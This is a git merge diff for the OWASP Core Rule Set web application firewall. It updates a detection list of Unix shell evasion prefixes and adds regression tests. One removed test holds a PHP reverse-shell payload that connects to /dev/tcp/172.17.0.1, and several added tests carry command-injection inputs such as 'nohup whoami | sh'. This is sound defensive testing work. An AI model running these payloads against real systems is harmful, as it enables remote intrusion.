Merge branch 'v4.0/dev' into update-year-readme

.changes-pending.md

@@ -0,0 +1,8 @@
+ * chore: generate changelog entries with leading space (Max Leske) [#3550]
+ * fix: replace 'MATCHED_VAR' in 'logdata' argument with stable variable (Ervin Hegedus) [#3543]
+ * fix: reduce FPs at the start of strings by excluding 'as' and 'at' (932236 PL2) (Franziska Bühler, Max Leske, Andrew Howe) [#3531
+ * feat: consolidate 'unix-evasion-prefix*' files to ensure they don't diverge (various rules) (Franziska Bühler, Max Leske, Andrew Howe) [#3531]
+ * feat: reduce FPs by removing User-Agent from individual target list (932200 PL2) (Max Leske) [#3489]
+ * feat: remove SecCollectionTimeout from crs-setup.conf (Christian Folini) [#3559]
+ * docs: remove sponsor F5 / VMWare (Christian Folini) [#3555]
+ * feat: add additional prefix commands to 'unix-shell-evasion-prefix' (various rules) (Jitendra Patro) [#3557

SPONSORS.md

@@ -1,6 +1,5 @@
 ## GOLD SPONSORS
 
-* F5 / NGINX
 * Google
 * United Security Providers
 

crs-setup.conf.example

@@ -748,24 +748,6 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    setvar:tx.crs_validate_utf8_encoding=1"
 
 
-#
-# -- [[ Collection timeout ]] --------------------------------------------------
-#
-# Set the SecCollectionTimeout directive from the ModSecurity default (1 hour)
-# to a lower setting which is appropriate to most sites.
-# This increases performance by cleaning out stale collection (block) entries.
-#
-# This value should be greater than or equal to any block durations or timeouts
-# set by plugins that make use of ModSecurity's persistent collections (e.g. the
-# DoS protection and IP reputation plugins).
-#
-# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-(v2.x)#SecCollectionTimeout
-
-# Please keep this directive uncommented.
-# Default: 600 (10 minutes)
-SecCollectionTimeout 600
-
-
 #
 # -- [[ End of setup ]] --------------------------------------------------------
 #

regex-assembly/include/unix-shell-evasion-prefix.ra

@@ -10,7 +10,10 @@
 ##!> cmdline unix
   busybox
   command
+  env
+  eval
   ltrace
+  nohup
   strace
   time
   timeout

tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml

@@ -264,53 +264,3 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "932200"
-  - test_title: 932200-17
-    desc: "RCE in request headers referer and user-agent"
-    stages:
-      - stage:
-          input:
-            dest_addr: 127.0.0.1
-            headers:
-              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
-              Host: localhost
-              User-Agent: <?php `/bin/bash -c \'sh -i>&/dev/tcp/172.17.0.1/54321 0>&1\'`; ?>
-            method: GET
-            port: 80
-            uri: /
-            version: HTTP/1.0
-          output:
-            log_contains: id "932200"
-  - test_title: 932200-18
-    desc: False positive test against query string and space in a parameter
-    stages:
-      - stage:
-          input:
-            dest_addr: 127.0.0.1
-            headers:
-              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Referer: "http://www.example.com/page?param=test+test"
-            method: GET
-            port: 80
-            uri: /get
-            version: HTTP/1.0
-          output:
-            no_log_contains: id "932200"
-  - test_title: 932200-19
-    desc: False positive test against query string and space in path
-    stages:
-      - stage:
-          input:
-            dest_addr: 127.0.0.1
-            headers:
-              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Referer: "http://www.example.com/page%20test?param=test"
-            method: GET
-            port: 80
-            uri: /get
-            version: HTTP/1.0
-          output:
-            no_log_contains: id "932200"

tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml

@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "Max Leske"
+  author: "Max Leske, Xhoenix"
   description: Unix shell RCE using pipe for less than 4 chars
   enabled: true
   name: 932220.yaml
@@ -233,3 +233,21 @@ tests:
               code=strace whoami | sh
           output:
             log_contains: id "932220"
+  - test_title: 932220-14
+    desc: "Block `nohup` prefix"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+            method: POST
+            port: 80
+            uri: /post
+            version: HTTP/1.0
+            data: |
+              code=nohup whoami | sh
+          output:
+            log_contains: id "932220"

tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml

@@ -1,6 +1,6 @@
 ---
 meta:
-  author: csanders-git, Piotr Pazola <[email protected]>, Franziska Bühler, Felipe Zipitria, Max Leske, Esad Cetiner
+  author: csanders-git, Piotr Pazola <[email protected]>, Franziska Bühler, Felipe Zipitria, Max Leske, Esad Cetiner, Xhoenix
   description: "Old tests and tests for fix of 932230 rule triggered with html decimal entities because of using legacy ISO-8859 charsets family - https://github.com/coreruleset/coreruleset/issues/1886. \nIf you need to trigger tests on a command, use one of the three letter commands in the file included by the 932230 data rule.\n"
   enabled: true
   name: 932230.yaml
@@ -1065,3 +1065,21 @@ tests:
               code=strace sh -c whoami
           output:
             log_contains: id "932230"
+  - test_title: 932230-57
+    desc: "Block `nohup` prefix"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+            method: POST
+            port: 80
+            uri: /post
+            version: HTTP/1.0
+            data: |
+              code=nohup sh -c whoami
+          output:
+            log_contains: id "932230"

tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml

@@ -380,3 +380,21 @@ tests:
             version: HTTP/1.1
           output:
             no_log_contains: id "932235"
+  - test_title: 932235-22
+    desc: "Block `nohup` prefix"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+            method: POST
+            port: 80
+            uri: /post
+            version: HTTP/1.0
+            data: |
+              code=nohup ifconfig
+          output:
+            log_contains: id "932235"

tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml

@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "Franziska Bühler, Max Leske, Esad Cetiner, Andrew Howe"
+  author: "Franziska Bühler, Max Leske, Esad Cetiner, Andrew Howe, Xhoenix"
   description: |
     Unix shell RCE
       - with / without prefix
@@ -1158,3 +1158,21 @@ tests:
               sentence=At any moment we can make a decision to change.
           output:
             no_log_contains: id "932236"
+  - test_title: 932236-64
+    desc: "Block `nohup` prefix"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+            method: POST
+            port: 80
+            uri: /post
+            version: HTTP/1.0
+            data: |
+              code=nohup ifconfig
+          output:
+            log_contains: id "932236"

tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml

@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "Max Leske"
+  author: "Max Leske, Xhoenix"
   enabled: true
   name: "932238.yaml"
 tests:
@@ -166,3 +166,21 @@ tests:
               code=strace who
           output:
             log_contains: "id \"932238\""
+  - test_title: 932238-10
+    desc: "Block `nohup` prefix"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+            method: POST
+            port: 80
+            uri: /post
+            version: HTTP/1.0
+            data: |
+              code=nohup who
+          output:
+            log_contains: "id \"932238\""

tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml

@@ -1,6 +1,6 @@
 ---
 meta:
-  author: "Franziska Bühler, Max Leske, Esad Cetiner"
+  author: "Franziska Bühler, Max Leske, Esad Cetiner, Xhoenix"
   description: |
     Unix shell RCE
       - with / without prefix
@@ -631,3 +631,19 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "932239"
+  - test_title: 932239-37
+    desc: "Block `nohup` prefix"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+              Host: localhost
+              User-Agent: "nohup ifconfig"
+            method: POST
+            port: 80
+            uri: /post
+            version: HTTP/1.0
+          output:
+            log_contains: id "932239"